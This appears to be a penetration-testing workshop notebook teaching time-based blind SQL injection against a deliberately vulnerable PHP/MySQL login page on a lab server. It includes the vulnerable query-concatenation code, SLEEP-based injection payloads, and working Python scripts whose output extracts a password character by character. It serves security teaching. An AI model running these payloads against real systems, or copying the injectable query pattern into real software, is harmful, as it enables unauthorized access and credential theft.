# WORKSHOP 1: Web Penetration Testing 1
## Part three: timing injection
This is the last injection-based attack. Again, we'll be attacking a server running PHP and MySQL. This attack is very similar to the blind attack, so let's take care of this quickly.

Here's the webpage, as usual:

In [1]:
from IPython.display import IFrame, HTML

# I'm declaring URL as a global variable because the workshop
# is located on a local IP which is subject to change.
# Make sure you run this code first to declare the variable.
URL = 'http://172.16.4.60/ws1/login.php'

IFrame(URL, width='100%', height=400)

### Analysis

As indicated by the warning message, there's no apparent response to anything you type into the box. You can inject all you want, the only thing that will every show up is "login failed". So, game over, right? There's nothing we can possibly get from the response text.

Maybe there's something we're missing. Let's look at the PHP code again:
```PHP
\$link = mysqli_connect("127.0.0.1","ws1login","<password>","workshop1");
\$username = \$_POST["username"];
\$password = \$_POST["password"];
\$query = "select * from users3 where username ='" . \$username . "' and password = '" . \$password . "';";
\$result = \$link->query(\$query);
if (mysqli_num_rows(\$result) == 0) {
    echo "<h2>login failed</h2>";
}
else {
    echo "<h2>login failed</h2>";
}
mysqli_close(\$link);
```
(Note: the \\\$ are due to issues with Jupyter code markdown and MathJax. The actual code has no backslashes)
    
Looks like the usual. Unfortunately, it looks like the developer (me) was lazy and just added a login failed statement instead of real login code. So, either I'm a nihlist or there's some way to extract information without any help from the response text.

### Attack
Well, I may be a nihlist but this particular workshop does have a solution. There's one last SQL concept I need to introduce, the `SLEEP` statement. This can be inserted in an ordinary query like so:
```MySQL
SELECT * FROM users WHERE password LIKE BINARY "pass%" AND SLEEP(1);
```
If you're familiar with how `if` statements are evaluated in language like C and python, you may see where I'm going with this. SQL uses what's called short-circuit evaluation: if it can find the answer to a conditional statement early on, it doesn't bother checking the rest of the statement. For example, in the following statement:
```MySQL
SELECT * FROM users WHERE username="bob" AND password="bobspassword";
```
If there isn't any user named bob, MySQL won't bother looking at passwords; it already knows the query won't return anything, so it stops. The same applies to this statement:
```MySQL
SELECT * FROM users WHERE username="bob" AND SLEEP(1);
```
It may seem weird that we're putting a delay in a conditional statement, but this works the same as the above. If there's no user named bob, SQL will short circuit the query and there will be no delay. If there is a user named bob, SQL won't short circuit and there will be a 1 second delay. I've put the python code below: you should stop here before looking at it and think about how we can use this behavior to do the same thing we did in part two.

In [2]:
import requests

possible_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

for char in possible_chars:
    password_guess = char
    payload = {"username" : "FLAG' AND password LIKE BINARY '" + password_guess + "%' AND SLEEP(0.5); #",
               "password" : "blah"}

    response = requests.post(URL, data=payload)
    if response.elapsed.total_seconds() > 0.5:
        print(password_guess)

w


As I hope you've noticed, we're now in the exact same situation as part two. All I did was add `AND SLEEP(0.5)` to the query and change the condition to `response.elapsed.total_seconds() > 0.5`. Let's copy the code over from part two, with those two modifications.

In [3]:
password_guess = ""

while True:
    new_character = False
    for char in possible_chars:
        payload = {"username" : "FLAG' AND password LIKE BINARY '" + password_guess + char + "%' AND SLEEP(0.5); #",
                   "password" : "blah"}
        
        response = requests.post(URL, data=payload)
        if response.elapsed.total_seconds() > 0.5:
            password_guess = password_guess + char
            print(password_guess)
            new_character = True
    
    if not new_character:
        break

w
w5
w5M
w5Ml
w5Mlj
w5Mljl
w5MljlL
w5MljlLk
w5MljlLk1
w5MljlLk1c
w5MljlLk1cK
w5MljlLk1cK8
w5MljlLk1cK8O
w5MljlLk1cK8OT
w5MljlLk1cK8OTK
w5MljlLk1cK8OTKM


And there it is! A little slower than last time, but it works almost the same way.

Feel free to push down the sleep duration as much as you can; I left it at a fairly high value to avoid any errors, but you can speed things up pretty significantly if you have a good connection. When timing attacks are going through the internet, the process gets a little more complicated because the timing won't be as consistent. With some patience, however, this attack will always work.

Again, all you have to do to defend against this is sanitize all inputs. I hope through the first three parts of this workshop you've realized how devastating allowing any kind of injection can be!